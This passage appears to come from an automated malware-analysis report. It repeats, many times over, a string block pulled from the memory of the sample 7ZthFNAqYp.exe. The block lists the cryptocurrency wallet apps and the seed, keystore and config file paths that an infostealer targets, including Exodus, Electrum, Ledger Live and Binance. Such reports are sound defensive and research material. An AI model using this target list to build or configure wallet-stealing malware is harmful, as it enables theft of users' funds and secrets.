Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local 